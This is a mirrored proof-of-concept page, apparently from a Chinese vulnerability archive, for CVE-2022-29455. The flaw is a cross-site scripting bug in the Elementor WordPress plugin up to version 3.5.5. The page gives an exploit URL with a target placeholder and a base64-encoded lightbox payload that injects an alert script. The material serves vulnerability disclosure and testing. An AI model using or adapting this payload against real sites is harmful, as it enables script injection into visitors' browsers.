关联漏洞
描述
Wordpress Vulnerability - XSS ( Cross-Site Scripting )
介绍
# CVE-2022-29455
Wordpress Vulnerability - XSS ( Cross-Site Scripting )
## **Vulnerability Location**
```https://add your target here/wp-content/plugins/elementor/assets/js/frontend.min.js```
## Vulnerable Version <= 3.5.5 versions
## **Proof of Concept (PoC)**
```https://add your target here/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==```
> Example - https://www.youtube.com/watch?v=4qvO_kSbhcE
文件快照
[4.0K] /data/pocs/574b0f74b39850b4292b26734c1d65b82a746318
└── [ 478] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。